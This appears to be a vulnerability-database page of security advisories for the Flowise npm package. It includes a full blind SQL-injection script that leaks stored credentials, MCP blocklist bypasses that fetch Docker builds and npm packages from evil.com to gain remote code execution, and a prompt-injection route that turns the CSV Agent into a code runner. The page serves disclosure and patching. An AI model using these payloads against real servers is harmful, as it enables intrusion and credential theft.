Search for packages
| purl | pkg:npm/flowise@1.3.5 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-14af-nhf3-aqba
Aliases: CVE-2026-41277 GHSA-3prp-9gf7-4rxx |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, a Mass Assignment vulnerability in the DocumentStore creation endpoint allows authenticated users to control the primary key (id) and internal state fields of DocumentStore entities. Because the service uses repository.save() with a client-supplied primary key, the POST create endpoint behaves as an implicit UPSERT operation. This enables overwriting existing DocumentStore objects. In multi-workspace or multi-tenant deployments, this can lead to cross-workspace object takeover and broken object-level authorization (IDOR), allowing an attacker to reassign or modify DocumentStore objects belonging to other workspaces. This vulnerability is fixed in 3.1.0. |
Affected by 15 other vulnerabilities. |
|
VCID-17k4-psgt-sydg
Aliases: GHSA-m7mq-85xj-9x33 |
Flowise: Weak Default Token Hash Secret **Detection Method:** Kolega.dev Deep Code Scan | Attribute | Value | |---|---| | Location | packages/server/src/enterprise/utils/tempTokenUtils.ts:31-34 | | Practical Exploitability | Medium | | Developer Approver | faizan@kolega.ai | ### Description The encryption key for token encryption has a weak default value 'Secre$t' when TOKEN_HASH_SECRET environment variable is not set. ### Affected Code ``` const key = crypto .createHash('sha256') .update(process.env.TOKEN_HASH_SECRET || 'Secre$t') .digest() ``` ### Evidence The default value 'Secre$t' is hardcoded in the source code and is cryptographically weak. This key is used to encrypt user IDs and workspace IDs in JWT tokens. ### Impact Token forgery - attackers can decrypt and manipulate encrypted token metadata, potentially changing user IDs or workspace IDs to escalate privileges or access unauthorized data. ### Recommendation Require TOKEN_HASH_SECRET to be set as a strong random value in environment variables. Throw an error on startup if not configured. Use a minimum of 32 bytes of entropy. ### Notes The TOKEN_HASH_SECRET has a weak hardcoded default 'Secre$t' (lines 31-34 and 50-53). This secret is used to derive an AES-256-CBC encryption key for encrypting sensitive metadata (user ID and workspace ID) embedded in JWT tokens via encryptToken() called at line 394 of passport/index.ts. If TOKEN_HASH_SECRET is not configured, an attacker knowing the default can decrypt the 'meta' field in JWTs to extract user IDs and workspace IDs. While this alone doesn't grant access (the JWT signature is separate), it leaks internal identifiers that could aid other attacks. The .env.example shows '# TOKEN_HASH_SECRET='popcorn'' - another weak value, and it's commented out suggesting it's optional. The application should require this secret to be explicitly set with a strong random value. |
Affected by 15 other vulnerabilities. |
|
VCID-19jc-umg6-v7ce
Aliases: CVE-2026-43995 GHSA-qqvm-66q4-vf5c |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, multiple tool implementations directly import and invoke raw HTTP clients (node-fetch, axios) instead of using the secured wrapper. These tools include (1) OpenAPIToolkit/OpenAPIToolkit.ts, (2) WebScraperTool/WebScraperTool.ts, (3) MCP/core.ts, and (4) Arxiv/core.ts. This vulnerability is fixed in 3.1.0. |
Affected by 15 other vulnerabilities. |
|
VCID-1a8e-2a56-e3hf
Aliases: CVE-2025-55346 GHSA-hmgh-466j-fx4c |
User-controlled input flows to an unsafe implementation of a dynamic Function constructor, allowing network attackers to run arbitrary unsandboxed JS code in the context of the host, by sending a simple POST request. |
Affected by 65 other vulnerabilities. |
|
VCID-1xfp-4rtg-4bcu
Aliases: CVE-2026-41138 GHSA-f228-chmx-v6j6 |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, there is a remote code execution vulnerability in AirtableAgent.ts caused by lack of input verification when using Pandas. The user’s input is directly applied to the question parameter within the prompt template and it is reflected to the Python code without any sanitization. This vulnerability is fixed in 3.1.0. |
Affected by 15 other vulnerabilities. |
|
VCID-2891-vddv-ebff
Aliases: CVE-2026-42863 GHSA-5wxp-qjgq-fx6m |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, a mass assignment vulnerability exists in the chatflow update endpoint of FlowiseAI. The endpoint allows clients to modify server-controlled properties such as deployed, isPublic, workspaceId, createdDate, and updatedDate when updating a chatflow object. Due to missing server-side validation and authorization checks, an authenticated user can manipulate internal attributes of a chatflow and reassign it to another workspace. This allows cross-workspace resource reassignment and unauthorized modification of deployment and visibility settings. This issue has been patched in version 3.1.2. |
Affected by 0 other vulnerabilities. |
|
VCID-2ua7-cys1-p7bm
Aliases: CVE-2024-9148 GHSA-m5p9-xvxj-64c8 |
Flowise < 2.1.1 suffers from a Stored Cross-Site vulnerability due to a lack of input sanitization in Flowise Chat Embed < 2.0.0. |
Affected by 67 other vulnerabilities. |
|
VCID-34u1-d22x-auea
Aliases: CVE-2024-37146 GHSA-wxm4-9f8p-gggv |
Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, a reflected cross-site scripting vulnerability occurs in the `/api/v1/credentials/id` endpoint. If the default configuration is used (unauthenticated), an attacker may be able to craft a specially crafted URL that injects Javascript into the user sessions, allowing the attacker to steal information, create false popups, or even redirect the user to other websites without interaction. If the chatflow ID is not found, its value is reflected in the 404 page, which has type text/html. This allows an attacker to attach arbitrary scripts to the page, allowing an attacker to steal sensitive information. This XSS may be chained with the path injection to allow an attacker without direct access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available. |
Affected by 71 other vulnerabilities. |
|
VCID-39aw-3gc6-bkgb
Aliases: CVE-2025-50538 GHSA-964p-j4gg-mhwc |
Flowise before 3.0.5 allows XSS via an IFRAME element when an admin views the chat log. |
Affected by 51 other vulnerabilities. |
|
VCID-3chx-dj2u-kbab
Aliases: CVE-2026-42861 GHSA-6fw7-3q8r-m5vj |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, a mass assignment vulnerability exists in the variable update endpoint of FlowiseAI. The endpoint allows authenticated users to modify server-controlled properties such as workspaceId, createdDate, and updatedDate when updating a variable resource. Due to missing server-side validation and authorization checks, an attacker can manipulate the workspaceId field and reassign variables to arbitrary workspaces. This behavior may break tenant isolation in multi-workspace environments. This issue has been patched in version 3.1.2. |
Affected by 0 other vulnerabilities. |
|
VCID-3gp6-wwtd-kkf1
Aliases: CVE-2026-41279 GHSA-5fw2-mwhh-9947 |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the text-to-speech generation endpoint (POST /api/v1/text-to-speech/generate) is whitelisted (no auth) and accepts a credentialId directly in the request body. When called without a chatflowId, the endpoint uses the provided credentialId to decrypt the stored credential (e.g., OpenAI or ElevenLabs API key) and generate speech. This vulnerability is fixed in 3.1.0. |
Affected by 15 other vulnerabilities. |
|
VCID-488c-vrqu-f7hf
Aliases: CVE-2026-30820 GHSA-wvhq-wp8g-c7vq |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, Flowise trusts any HTTP client that sets the header x-request-from: internal, allowing an authenticated tenant session to bypass all /api/v1/** authorization checks. With only a browser cookie, a low-privilege tenant can invoke internal administration endpoints (API key management, credential stores, custom function execution, etc.), effectively escalating privilege. This issue has been patched in version 3.0.13. |
Affected by 41 other vulnerabilities. |
|
VCID-4uuk-69sk-hff8
Aliases: GHSA-9c4c-g95m-c8cp |
FlowiseDB vulnerable to SQL Injection by authenticated users ### Summary import functions are vulnerable. * [importChatflows](https://github.com/FlowiseAI/Flowise/blob/main/packages/server/src/services/chatflows/index.ts#L219) * [importTools](https://github.com/FlowiseAI/Flowise/blob/main/packages/server/src/services/tools/index.ts#L85) * [importVariables](https://github.com/FlowiseAI/Flowise/blob/main/packages/server/src/services/variables/index.ts) ### Details **Authenticated user** can call importChatflows API, import json file such as `AllChatflows.json`. but Due to insufficient validation to chatflow.id in importChatflows API, 2 issues arise. **Issue 1 (Bug Type)** 1. Malicious user creates `AllChatflows.json` file by adding `../` and arbitrary path to the chatflow.id of the json file. ```json { "Chatflows": [ { "id": "../../../../../../apikey", "name": "clickme", "flowData": "{}" } ] } ``` 2. Victim download this file, and import this to flowise. 3. When victim click created chatflow, victim access to flowise:3000/canvas/{chatflow.id}. **Issue 2 (Vulnerability Type)** importChatflows API use unsafe SQL Query. ```javascript // packages/server/src/services/chatflows/index.ts const importChatflows = async (newChatflows: Partial<ChatFlow>[]): Promise<any> => { try { const appServer = getRunningExpressApp() // step 1 - check whether file chatflows array is zero if (newChatflows.length == 0) return // step 2 - check whether ids are duplicate in database let ids = '(' let count: number = 0 const lastCount = newChatflows.length - 1 newChatflows.forEach((newChatflow) => { ids += `'${newChatflow.id}'` // <===== user input if (lastCount != count) ids += ',' if (lastCount == count) ids += ')' count += 1 }) const selectResponse = await appServer.AppDataSource.getRepository(ChatFlow) .createQueryBuilder('cf') .select('cf.id') .where(`cf.id IN ${ids}`) // <===== here .getMany() const foundIds = selectResponse.map((response) => { return response.id }) ``` It changes like `SELECT cf.id FROM cf WHERE cf.id IN ('{USER-INPUT...}')` by the code above. When `') {Malicious SQL Query} --` is passed to newChatflow.id, SQL Injection occurs. ### PoC ```python import argparse import requests def import_chatflows( url: str, token: str, payload: dict ): response = requests.post( f'{url}/api/v1/chatflows/importchatflows', headers={ 'Authorization': f'Bearer {token}' # 'Authorization': f'Basic {token}' }, json=payload ) return response.json() def import_normal_data( api_url: str, token: str, normal_data: str ): data_id = 'aaaaaa' payload = { "Chatflows": [ { "id": data_id, "name": normal_data, "flowData": "{}" } ] } import_chatflows( url=api_url, token=token, payload=payload ) return data_id def get_character( api_url: str, token: str, data_id: str, column_name: str, index: int ): injection_query = f'(SELECT ascii(substr({column_name},{index},1)) FROM credential limit 0,1)' def create_payload( c: int ): return f"{data_id}') and if (({injection_query})<{c}, 0, 9e300 * 9e300); -- " chatflows_json = { "Chatflows": [ { "id": "", "name": data_id, "flowData": "{}" } ] } bitbox = [ 64, 32, 16, 8, 4, 2, 1 ] character = 0 for bit in bitbox: payload = create_payload(c=character + bit) chatflows_json['Chatflows'][0]['id'] = payload res = import_chatflows( url=api_url, token=token, payload=chatflows_json ) if 'DOUBLE value is out of range' in res['message']: # character is more then bit character += bit else: # character is less then bit character += 0 return chr(character) def get_length( api_url: str, token: str, data_id: str, column_name: str ): injection_query = f'(SELECT length({column_name}) FROM credential limit 0,1)' def create_payload( c: int ): return f"{data_id}') and if (({injection_query})<{c}, 0, 9e300 * 9e300); -- " chatflows_json = { "Chatflows": [ { "id": "", "name": data_id, "flowData": "{}" } ] } column_len = 0 bitbox = [ 256, 128, 64, 32, 16, 8, 4, 2, 1 ] for bit in bitbox: payload = create_payload(c=column_len + bit) chatflows_json['Chatflows'][0]['id'] = payload res = import_chatflows( url=api_url, token=token, payload=chatflows_json ) if 'DOUBLE value is out of range' in res['message']: # column_len is more then bit column_len += bit else: # column_len is less then bit column_len += 0 return column_len def main( url: str, token: str ): api_url = url column_box = [ 'credentialName', 'encryptedData' ] data_id = import_normal_data( api_url=api_url, token=token, normal_data='flow01' ) for column_name in column_box: column_len = get_length( api_url=api_url, token=token, data_id=data_id, column_name=column_name ) print(f'[+] {column_name} length is {column_len}') result = '' for i in range(column_len): result += get_character( api_url=api_url, token=token, data_id=data_id, column_name=column_name, index=i + 1 ) print(f'[+] {column_name}: {result}') if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument( '--url', type=str, default='http://flowise:3000' ) parser.add_argument( '--access', type=str, required=True, help='Get from http://flowise:3000/apikey' ) m_args = parser.parse_args() main( url=m_args.url, token=m_args.access ) ``` **poc results: encryptedData from flowise database credential table was successfully leaked.** ``` /app # python ex2.py --url http://flowise:3000 --access "blahblah~~~" [+] credentialName length is 9 [+] credentialName: openAIApi [+] encryptedData length is 88 [+] encryptedData: U2FsdGVkX19LlIhbD4M9q9reLWQilBY6ffWo2S9PQ669CP1HpMPa5g1h1rJL0ZK3x0UMsLi/8Pz6TbSFrmIZbg== ``` It is recommended to limit all chatflow ids & chat ids to UUID. ### Impact * Database leak * Lateral Movement | There are no reported fixed by versions. |
|
VCID-5j9e-bcr5-n7bs
Aliases: CVE-2026-46478 GHSA-7j65-65cr-6644 |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, DatasetRow create and update mass-assignment allows cross-workspace row takeover. This issue has been patched in version 3.1.2. |
Affected by 0 other vulnerabilities. |
|
VCID-5pup-kgaf-3ubw
Aliases: CVE-2026-41264 GHSA-3hjv-c53m-58jj |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the specific flaw exists within the run method of the CSV_Agents class. The issue results from the lack of proper sandboxing when evaluating an LLM generated python script. An attacker can leverage this vulnerability to execute code in the context of the user running the server. Using prompt injection techniques, an unauthenticated attacker with the ability to send prompts to a chatflow using the CSV Agent node may convince an LLM to respond with a malicious python script that executes attacker controlled commands on the Flowise server. This vulnerability is fixed in 3.1.0. |
Affected by 15 other vulnerabilities. |
|
VCID-66td-xcza-pba7
Aliases: CVE-2024-31621 GHSA-6wp6-22x5-rr3w |
An issue in FlowiseAI Inc Flowise v.1.6.2 and before allows a remote attacker to execute arbitrary code via a crafted script to the api/v1 component. |
Affected by 70 other vulnerabilities. |
|
VCID-67mz-pfy4-ykep
Aliases: CVE-2026-46442 GHSA-9rvc-vf7m-pgm2 |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, POST /api/v1/node-custom-function lacks route-level authorization, allowing any authenticated user or API key to submit arbitrary JavaScript to the Custom JS Function node. When E2B_APIKEY is not configured — the common deployment case — Flowise executes this code inside a NodeVM sandbox. This sandbox can be escaped, allowing an attacker to reach the host process object and execute system commands via child_process. The result is authenticated remote code execution on the Flowise server host. This issue has been patched in version 3.1.2. |
Affected by 0 other vulnerabilities. |
|
VCID-6ufs-d346-d7ev
Aliases: CVE-2026-8026 GHSA-8f47-4rh3-x44m |
A security flaw has been discovered in FlowiseAI Flowise up to 3.0.12. Affected is the function Login of the file packages/server/src/enterprise/services/account.service.ts of the component API Response Handler. The manipulation results in information disclosure. The attack can be launched remotely. A high complexity level is associated with this attack. The exploitability is told to be difficult. You should upgrade the affected component. |
Affected by 41 other vulnerabilities. |
|
VCID-6uza-cay5-t3a5
Aliases: CVE-2024-36423 GHSA-fccx-2pwj-hrq7 |
Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, a reflected cross-site scripting vulnerability occurs in the `/api/v1/public-chatflows/id` endpoint. If the default configuration is used (unauthenticated), an attacker may be able to craft a specially crafted URL that injects Javascript into the user sessions, allowing the attacker to steal information, create false popups, or even redirect the user to other websites without interaction. If the chatflow ID is not found, its value is reflected in the 404 page, which has type text/html. This allows an attacker to attach arbitrary scripts to the page, allowing an attacker to steal sensitive information. This XSS may be chained with the path injection to allow an attacker without direct access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available. |
Affected by 71 other vulnerabilities. |
|
VCID-6wat-8akx-hycz
Aliases: GHSA-q4xx-mc3q-23x8 |
Duplicate Advisory: Flowise vulnerable to RCE via Dynamic function constructor injection ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-hmgh-466j-fx4c. This link is maintained to preserve external references. ### Original Description User-controlled input flows to an unsafe implementation of a dynamic Function constructor, allowing network attackers to run arbitrary unsandboxed JS code in the context of the host, by sending a simple POST request. | There are no reported fixed by versions. |
|
VCID-71uq-yx2j-cqak
Aliases: CVE-2026-41275 GHSA-x5w6-38gp-mrqh |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the password reset functionality on cloud.flowiseai.com sends a reset password link over the unsecured HTTP protocol instead of HTTPS. This behavior introduces the risk of a man-in-the-middle (MITM) attack, where an attacker on the same network as the user (e.g., public Wi-Fi) can intercept the reset link and gain unauthorized access to the victim’s account. This vulnerability is fixed in 3.1.0. |
Affected by 15 other vulnerabilities. |
|
VCID-9bht-svq8-87b4
Aliases: GHSA-x2g5-fvc2-gqvp |
Flowise has Insufficient Password Salt Rounds |
Affected by 41 other vulnerabilities. |
|
VCID-9rqv-p7rz-5kar
Aliases: CVE-2026-46440 GHSA-php6-83fg-gw3g |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, the checkBasicAuth endpoint validates credentials in plaintext without rate limiting and with direct comparison. This issue has been patched in version 3.1.2. |
Affected by 0 other vulnerabilities. |
|
VCID-a1e4-f5dh-w3a5
Aliases: GHSA-6pcv-j4jx-m4vx |
Flowise: Unauthenticated Information Disclosure of OAuth Secrets (Cleartext) via GET Request ### Summary I have discovered a critical Missing Authentication vulnerability on the /api/v1/loginmethod endpoint. The API allows unauthenticated users (guests) to retrieve the full SSO configuration of any organization by simply providing an organizationId. The response includes sensitive OAuth credentials (Client Secrets) in cleartext. ### PoC The following request can be sent by anyone on the internet without any cookies or authorization headers. Request ```http GET /api/v1/loginmethod?organizationId=<any_organization_id> HTTP/2 Host: cloud.flowiseai.com Accept: application/json Content-Type: application/json ``` Response: The server returns 200 OK with sensitive credentials: ```json { "providers": [ { "id": "a04ba769-b810-481d-8d6b-84f8c377dea5", "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d", "name": "azure", "config": { "tenantID": "", "clientID": "", "clientSecret": "" }, "status": "disable", "createdDate": "2025-12-26T18:52:33.453Z", "updatedDate": "2025-12-26T19:31:56.087Z", "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2", "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2" }, { "id": "eda8bd90-1c45-4aca-933f-3a53d9be4161", "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d", "name": "google", "config": { "clientID": "123455", "clientSecret": "123455" }, "status": "enable", "createdDate": "2025-12-26T18:52:33.453Z", "updatedDate": "2025-12-26T19:31:56.087Z", "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2", "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2" }, { "id": "0d238df0-c89c-4733-bf57-6ec06f58c7e7", "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d", "name": "auth0", "config": { "domain": "", "clientID": "", "clientSecret": "" }, "status": "disable", "createdDate": "2025-12-26T18:52:33.453Z", "updatedDate": "2025-12-26T19:31:56.087Z", "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2", "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2" }, { "id": "e060ae88-c7f4-4b7c-9bdc-5321963a1648", "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d", "name": "github", "config": { "clientID": "", "clientSecret": "" }, "status": "disable", "createdDate": "2025-12-26T18:52:33.453Z", "updatedDate": "2025-12-26T19:31:56.087Z", "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2", "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2" } ], "callbacks": [ { "providerName": "azure", "callbackURL": "https://cloud.flowiseai.com/api/v1/azure/callback" }, { "providerName": "google", "callbackURL": "https://cloud.flowiseai.com/api/v1/google/callback" }, { "providerName": "auth0", "callbackURL": "https://cloud.flowiseai.com/api/v1/auth0/callback" }, { "providerName": "github", "callbackURL": "https://cloud.flowiseai.com/api/v1/github/callback" } ] } ``` ### Affected Deployments - FlowiseAI Cloud (cloud.flowiseai.com) - Self-hosted FlowiseAI instances where the /api/v1/loginmethod endpoint is exposed ### Impact An unauthenticated attacker can harvest sensitive API secrets (Google, Microsoft, GitHub Client Secrets) from any organization on the cloud platform. This leads to complete compromise of the organization's third-party integrations and potential data breaches. |
Affected by 15 other vulnerabilities. |
|
VCID-affy-v76q-fub6
Aliases: CVE-2026-30822 GHSA-mq4r-h2gh-qv7x |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, unauthenticated users can inject arbitrary values into internal database fields when creating leads. This issue has been patched in version 3.0.13. |
Affected by 41 other vulnerabilities. |
|
VCID-aqg8-6us7-uqef
Aliases: CVE-2026-41266 GHSA-4jpm-cgx2-8h37 |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, /api/v1/public-chatbotConfig/:id ep exposes sensitive data including API keys, HTTP authorization headers and internal configuration without any authentication. An attacker with knowledge just of a chatflow UUID can retrieve credentials stored in password type fields and HTTP headers, leading to credential theft and more. This vulnerability is fixed in 3.1.0. |
Affected by 15 other vulnerabilities. |
|
VCID-b97u-efzx-dffn
Aliases: CVE-2026-41274 GHSA-28g4-38q8-3cwc |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the GraphCypherQAChain node forwards user-provided input directly into the Cypher query execution pipeline without proper sanitization. An attacker can inject arbitrary Cypher commands that are executed on the underlying Neo4j database, enabling data exfiltration, modification, or deletion. This vulnerability is fixed in 3.1.0. |
Affected by 15 other vulnerabilities. |
|
VCID-bkmk-k9mn-ekhx
Aliases: GHSA-2qqc-p94c-hxwh |
Flowise: Weak Default Express Session Secret **Detection Method:** Kolega.dev Deep Code Scan | Attribute | Value | |---|---| | Location | packages/server/src/enterprise/middleware/passport/index.ts:55 | | Practical Exploitability | High | | Developer Approver | faizan@kolega.ai | ### Description Express session secret has a weak default value 'flowise' when EXPRESS_SESSION_SECRET is not set. ### Affected Code ``` secret: process.env.EXPRESS_SESSION_SECRET || 'flowise' ``` ### Evidence The default session secret 'flowise' is publicly visible and weak. Session cookies signed with this secret can be forged by attackers. ### Impact Session hijacking and forgery - attackers can create arbitrary session cookies to impersonate any user, bypassing all authentication mechanisms. ### Recommendation Require EXPRESS_SESSION_SECRET to be set with a strong random value. Throw an error on startup if not configured. Use cryptographically strong random strings (minimum 256 bits). ### Notes The Express session secret defaults to the string 'flowise' when EXPRESS_SESSION_SECRET is not set (line 55). This secret is used to sign session cookies via express-session middleware. Since 'flowise' is publicly visible in the source code, an attacker can forge valid session cookies to impersonate any user without authentication. The .env.example file has this commented out (# EXPRESS_SESSION_SECRET=flowise), implying it's optional, which compounds the risk. Unlike development-only defaults, this code path is active in production if the environment variable is not set. The application should require EXPRESS_SESSION_SECRET to be explicitly configured with a cryptographically strong random value and fail to start otherwise. |
Affected by 15 other vulnerabilities. |
|
VCID-cb6d-4c2v-w7c3
Aliases: GHSA-m99r-2hxc-cp3q |
Flowise has an MCP Security Bypass that Enables RCE ## Summary There are three bypass methods for the security limitations of the Flowise MCP feature, and attackers can execute arbitrary commands by combining these three methods ## Details ### 【Vulnerability one】The Docker build subcommand not being on the blocklist leads to remote code execution The attacker configures the interface through the MCP tool to provide {"command":"docker","args":["build","https://evil.com/"]} as the Custom MCP Server configuration → Bypass the validateCommandFlags docker blocklist (only blocks run/exec/-v/--volume, etc., but does not block build) → docker build <remote-URL> will pull the Dockerfile from the remote address and execute the RUN instructions within it → Allows attackers to escape from Docker through methods such as mounting, thereby gaining full control of the Flowise host machine Precondition: 1. Have a Flowise account (any role, including regular users) or an API with view&update permissions for chatflows 2. The deployment environment has the docker command Vulnerable function - validateCommandFlags: ``` file: packages/components/nodes/tools/MCP/core.ts:260-310 const COMMAND_FLAG_BLACKLIST: Record<string, string[]> = { docker: [ 'run', 'exec', '-v', '--volume', '--privileged', '--cap-add', '--security-opt', '--network', '--pid', '--ipc' // 'build', 'pull', 'push', 'cp', 'commit' are not on the blocklist ], npx: ['-c', '--call', '--shell-auto-fallback', '-y'], npm: ['run', 'exec', 'install', '--prefix', '-g', '--global', 'publish', 'adduser', 'login'], // ... } export function validateCommandFlags(command: string, args: string[]): ValidationResult { const blacklist = COMMAND_FLAG_BLACKLIST[command] || [] for (const arg of args) { if (blacklist.includes(arg)) { return { valid: false, error: `Argument '${arg}' is not allowed for command '${command}'` } } } return { valid: true } } ``` Reproduction process: Add MCP config via UI or API interface, for example: <img width="1280" height="414" alt="2f0b6dfad5458616781921e1c28339d0" src="https://github.com/user-attachments/assets/6c8419c5-6261-46bb-8a30-3ac1ec3fb599" /> Then execute: ``` POST /api/v1/prediction/{chatflows_id} HTTP/1.1 Host: 127.0.0.1:3000 Content-Type: application/json Authorization: Bearer apikey Content-Length: 17 {"question": "1"} ``` After execution, the command can be triggered to execute docker build http://evil.com <img width="1280" height="319" alt="f98e1d91428be6077ac6cf0472285f17" src="https://github.com/user-attachments/assets/856d46b4-7949-4091-bed9-a7c3fecc62f0" /> If a privileged container is deployed, then it can fully control the Flowise host machine ### 【Vulnerability two】 npx --yes long parameter alias bypassing blocklist leads to remote code execution The attacker configures the MCP tool to provide {"command":"npx","args":["--yes","malicious-package"]} → validateCommandFlags npx blocklist only contains short parameter -y, and does not block long parameter alias --yes → npx --yes malicious-package automatically agrees to install and execute any npm package → Leads to remote code execution (RCE) on the server Precondition: 1. Have a Flowise account (any role, including regular users) or an API with view&update permissions for chatflows 2. The deployment environment has the npx command npx blocklist: ``` file: packages/components/nodes/tools/MCP/core.ts:270-280 npx: ['-c', '--call', '--shell-auto-fallback', '-y'], // Only the short parameter -y is present, without the long parameter alias --yes ``` Reproduction process: Add MCP config via UI or API interface, for example: <img width="1910" height="690" alt="85ea14ea224df9ed501827dfa47afb09" src="https://github.com/user-attachments/assets/8f3a2299-5460-4d23-b113-79ba4a9e52b6" /> ``` { "command": "npx", "args":["--yes", "http://evil.com/FileName.tar"] } ``` Contents of the tar file: ``` // index.js #!/usr/bin/env node const http = require('http'); const { execSync } = require('child_process'); const result = execSync('id && hostname').toString().trim(); console.error('[MCP-RCE-002] npx --yes bypass: ' + result); // package.json { "name": "attacker-mcp-pkg", "version": "1.0.0", "bin": { "attacker-mcp-pkg": "./index.js" }, "scripts": { "postinstall": "" } } ``` Then execute: ``` POST /api/v1/prediction/{chatflows_id} HTTP/1.1 Host: 127.0.0.1:3000 Content-Type: application/json Authorization: Bearer apikey Content-Length: 17 {"question": "1"} ``` can trigger the vulnerability, execute the attacker's commands, and achieve RCE: <img width="3026" height="256" alt="4c466067deb4606a38e4b73806661328" src="https://github.com/user-attachments/assets/e9821e3f-bda4-4c6a-bcd1-0b19053045c9" /> ### node command bypassing local file restrictions leads to remote code execution When configuring the CustomMCP node, the attacker provides {"command":"node","args":["local file"]} → Bypass the security restrictions of validateArgsForLocalFileAccess → Node process loads local files and executes arbitrary code → RCE Precondition: Have a Flowise account Analysis of Vulnerable Code: ``` // packages/components/nodes/tools/MCP/core.ts:177-220 export const validateArgsForLocalFileAccess = (args: string[]): void => { const dangerousPatterns = [ // Absolute paths /^\/[^/]/, // Unix absolute paths starting with / /^[a-zA-Z]:\\/, // Windows absolute paths like C:\ // Relative paths that could escape current directory /\.\.\//, // Parent directory traversal with ../ /\.\.\\/, // Parent directory traversal with ..\ /^\.\./, // Starting with .. // Local file access patterns /^\.\//, // Current directory with ./ /^~\//, // Home directory with ~/ /^file:\/\//, // File protocol // Common file extensions that shouldn't be accessed /\.(exe|bat|cmd|sh|ps1|vbs|scr|com|pif|dll|sys)$/i, // File flags and options that could access local files /^--?(?:file|input|output|config|load|save|import|export|read|write)=/i, /^--?(?:file|input|output|config|load|save|import|export|read|write)$/i ] ``` The above are the main restrictions imposed by the validateArgsForLocalFileAccess function, and it can be found that the regular expression "/^\/[^/]/" has a matching issue As the comment says, this regular expression essentially detects whether it is a Unix absolute path, which matches /etc/passwd but does not match //etc/passwd (the second character is '/') <img width="1280" height="570" alt="ea354264cbb2ace6a3a6a16e00f1d298" src="https://github.com/user-attachments/assets/9ca88790-77ea-4d42-8910-09e4453f981a" /> Therefore, the limitation of this function can be bypassed by starting with // ** Reproduction process: ** Create a new chatflow as follows: <img width="1280" height="716" alt="7e884613b5897509b39467f8f3b7aae1" src="https://github.com/user-attachments/assets/478c7a89-4e77-4a5d-b063-de16cb640f92" /> After saving, cmd.js will be uploaded to the ~/.flowise/storage/{orgId}/{chatflow_id}/ directory orgId can be obtained during login, and chatflow_id will also be returned when saving chatflow: <img width="1280" height="702" alt="48b5ab8412babba312f502be5db1dad3" src="https://github.com/user-attachments/assets/090292cf-6361-43cd-91d7-eec6e578255b" /> For example: ``` ~/.flowise/storage/d2312f99-9043-413a-a1d2-3b7685a132b2/f8cc7f34-a1e5-4180-940a-47306d32adc2/cmd.js ``` Since paths like ~/ are restricted, and an absolute path needs to be obtained, use the following method: <img width="1280" height="716" alt="990e1c81ed3957c5ae823e55efec15a5" src="https://github.com/user-attachments/assets/02c2a949-559a-4ee4-9675-c50a203d1e99" /> ``` POST /api/v1/export-import/import HTTP/1.1 Host: 127.0.0.1:3000 Content-Type: application/json x-request-from: internal Cookie: cookie Connection: keep-alive Content-Length: 479 { "ChatMessage": [ { "id": "11111111-2222-4333-8444-555555555555", "role": "userMessage", "chatflowid": "{chatflow_id}", "content": "seed for home path test", "chatType": "EXTERNAL", "chatId": "audit-home-001", "createdDate": "2026-03-04T06:40:00.000Z", "fileUploads": "[{\"type\":\"stored-file\",\"name\":\"poc.txt\",\"mime\":\"text/plain\"}]" } ] } ``` <img width="1280" height="748" alt="d7f947940f4e6b6e95a61bcc301c25c0" src="https://github.com/user-attachments/assets/482fb78c-dbc8-4a0d-a042-4c993e976f10" /> ``` POST /api/v1/export-import/chatflow-messages HTTP/1.1 Host: 127.0.0.1:3000 Content-Type: application/json x-request-from: internal Cookie: cookie Connection: keep-alive Content-Length: 57 {"chatflowId":"{chatflow_id}"} ``` After obtaining the absolute path, simply modify the path in args to the path of the file name: ``` { "command": "node", "args": ["//root/.flowise/storage/d2312f99-9043-413a-a1d2-3b7685a132b2/f8cc7f34-a1e5-4180-940a-47306d32adc2/cmd.js"] } ``` After saving, execution will trigger RCE ``` POST /api/v1/prediction/{chatflows_id} HTTP/1.1 Host: 127.0.0.1:3000 Content-Type: application/json Authorization: Bearer apikey Content-Length: 17 {"question": "1"} ``` ## Impact This vulnerability allows attackers to execute arbitrary commands on the Flowise server . |
Affected by 0 other vulnerabilities. |
|
VCID-cxja-9yxc-k7au
Aliases: CVE-2026-46441 GHSA-hp26-q66v-q2w7 |
